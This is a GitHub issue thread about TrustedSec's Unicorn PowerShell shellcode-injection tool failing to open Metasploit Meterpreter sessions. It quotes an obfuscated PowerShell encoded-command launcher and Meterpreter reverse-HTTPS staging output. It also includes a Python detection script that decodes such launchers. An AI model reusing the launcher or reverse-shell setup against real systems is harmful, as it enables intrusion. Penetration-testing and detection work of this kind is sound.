trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

unicorn.rc: Exploit completed, but no session was created #140

Closed Mischala closed 4 years ago

Mischala commented 4 years ago

On metasploit v5.0.84-dev the attached unicorn.rc fails to execute properly. I believe the Stager Listener is failing to run, resulting in a background job waiting for a proper Meterpreter connection, which never comes.

Attached is my output from running the generated unicorn.rc, and the `powershell_attack.txt`.

I'm willing to look into the issue myself, if you can point me in the right direction.

Thanks!

Attachments: powershell_attack.txt, unicorn.rc.txt, MSFOutput.txt

felixguerrero12 commented 4 years ago

I am having issues getting my callbacks also with this recent deployment. Searching through the code to see if I can find what the fix is - might want to choose a tree that works.

little-dao commented 4 years ago

Same issue: when the machine executes the powershell code, it returns lots of numbers.

HackingDave commented 4 years ago

The numbers are normal. I'm not able to reproduce, unfortunately. What OS are you testing on? Mine's on Windows 10 64 and 32 bit.

msf5 exploit(multi/handler) > 
[*] https://172.16.253.142:443 handling request from 172.16.253.128; (UUID: lndmltkx) Staging x86 payload (181337 bytes) ...
[*] Meterpreter session 1 opened (172.16.253.142:443 -> 172.16.253.128:49744) at 2020-04-26 10:46:51 -0400
HackingDave commented 4 years ago

Do me a favor and change the first part of the code that you have pasted there from:

powershell /w 1 /C "s''v gG -;s''v awT e''c;s''v YtZ ((g''v gG).value.toString()+(g''v awT).value.toString());powershell (g''v YtZ).value.toString()

To this:

powershell /w 1 /C "sv gG -;sv awT ec;sv YtZ ((gv gG).value.toString()+(gv awT).value.toString());powershell (gv YtZ).value.toString()

Let me know if that works.
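The change above only removes the empty-string quote splitting (`s''v` is the same cmdlet alias as `sv`); the launcher shape itself stays the same: two variables are set to `-` and `ec`, concatenated into the `-ec` (EncodedCommand) switch, and a child powershell is started with a base64 string built from `'...'+'...'` pieces. The following is an added detection example, not code from the thread or from the Unicorn project: it normalizes the quote splitting, matches that launcher shape in a process command line, and decodes the UTF-16LE base64 argument so a responder can see what was actually passed. Command lines and the base64 payload are constructed samples.

```python
import base64
import re

# Constructed sample command lines (not taken from the thread). The base64 blob encodes a
# harmless UTF-16LE string so the decode step can be exercised offline.
SAMPLE_PAYLOAD = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    # quote-split cmdlet aliases (s''v / g''v), as in the generated launcher before the change
    f"powershell /w 1 /C \"s''v gG -;s''v awT e''c;s''v YtZ ((g''v gG).value.toString()"
    f"+(g''v awT).value.toString());powershell (g''v YtZ).value.toString() ('{SAMPLE_PAYLOAD}')\"",
    # plain aliases, as in the suggested change
    f"powershell /w 1 /C \"sv gG -;sv awT ec;sv YtZ ((gv gG).value.toString()"
    f"+(gv awT).value.toString());powershell (gv YtZ).value.toString() ('{SAMPLE_PAYLOAD}')\"",
    # unrelated, benign command line
    "powershell -NoProfile -File C:\\scripts\\inventory.ps1",
]

# sv <a> -;sv <b> ec; ... powershell (gv <c>).value.toString() ('<base64 pieces>')
LAUNCHER = re.compile(
    r"sv\s+(\w+)\s+-\s*;\s*sv\s+(\w+)\s+ec\s*;.*?"
    r"powershell\s+\(gv\s+\w+\)\.value\.toString\(\)\s*\(([^)]*)\)",
    re.IGNORECASE | re.DOTALL,
)


def normalize(cmdline):
    """Drop the empty single-quoted strings that split cmdlet aliases (s''v -> sv, g''v -> gv)."""
    return cmdline.replace("''", "")


def analyze(cmdline):
    """Return None if the command line is not a launcher of this shape, else a summary dict."""
    m = LAUNCHER.search(normalize(cmdline))
    if not m:
        return None
    var_a, var_b, arg = m.groups()
    # Join the '...'+'...' pieces back into one base64 string and decode it as UTF-16LE,
    # which is what PowerShell expects after -EncodedCommand.
    b64 = arg.replace("'+'", "").strip("' ")
    try:
        decoded = base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = None  # malformed or truncated argument: still report the launcher match
    return {
        "quote_split": "''" in cmdline,   # True when the alias-splitting obfuscation was present
        "switch_vars": (var_a, var_b),    # the two variables that concatenate to -ec
        "decoded": decoded,
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze(line))
```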

HackingDave commented 4 years ago

Actually, just pull the latest version of Unicorn (just updated it) and give it a shot again.

Mischala commented 4 years ago

Was running in Kali Linux 64bit. Sadly I'm unable to retest until after Tuesday. My machine broke, and I'm waiting on parts.

ghost commented 4 years ago

I checked and it doesn't work even after pulling the latest release from here. I even tried editing the txt file and still, no success. rev_http, rev_tcp or rev_https don't work on any open port.

shankara-n commented 4 years ago

When the machine executes the powershell code, it returns lots of numbers, no shell. I'm trying this out on the retired machine "Arctic" from HackTheBox. 100% consistent.

shankara-n commented 4 years ago

Here's the config:

OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
x64-based PC

shankara-n commented 4 years ago

I'm suspecting it has something to do with meterpreter; I tried out version 2.8 of unicorn and got the same results. There's a video by ippsec on YouTube where he has it working in the year 2017 with all the latest stuff available then.

shankara-n commented 4 years ago

My current metasploit config:

Framework: 5.0.71-dev
Console: 5.0.71-dev

HackingDave commented 4 years ago

I haven't personally tested on 2008 R2; I've successfully tested on Windows 10. I'll spin up a VM and test on 2008.

shankara-n commented 4 years ago

Thanks Dave.

crimsoncore commented 4 years ago

Same problem here, never get a shell on metasploit v5.0.91-dev (Windows 10 ENT 1909 build 18363.418 and Windows 2012R2). Running it in PowerShell ISE gives me this:

powershell : At line:1 char:820 At line:1 char:1

powershell : + ... o,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,on ... At line:1 char:1

powershell : + ~~ At line:1 char:1

powershell : Unexpected token 'Th' in expression or statement. At line:1 char:1

powershell : At line:1 char:822 At line:1 char:1

powershell : + ... ,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... e,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,su ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... ,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sul ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... ,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGE ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGEr ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx At line:1 char:1

powershell : ception At line:1 char:1

powershell : + FullyQualifiedErrorId : UnexpectedToken At line:1 char:1

powershell :
At line:1 char:1


HackingDave commented 4 years ago

That error is different. I saw that yesterday when I was writing the new version; an update to metasploit fixed it. I would recommend updating Metasploit and re-running. There's an error message that is being added to the code.

crimsoncore commented 4 years ago

Hi Dave.

Confirmed, upgraded to metasploit v5.0.93-dev and it works now! Sorry for the lengthy post above :) On Windows 10 it's all good, and just checked Win2012R2 - also good :)

Many thanks for the tip!

Luk

HackingDave commented 4 years ago

Closing this as fixed. I also added a check to make sure that if someone runs into this problem it tells them to update.

shankara-n commented 4 years ago

I will try on 2008 R2 now with updated versions and get back to you.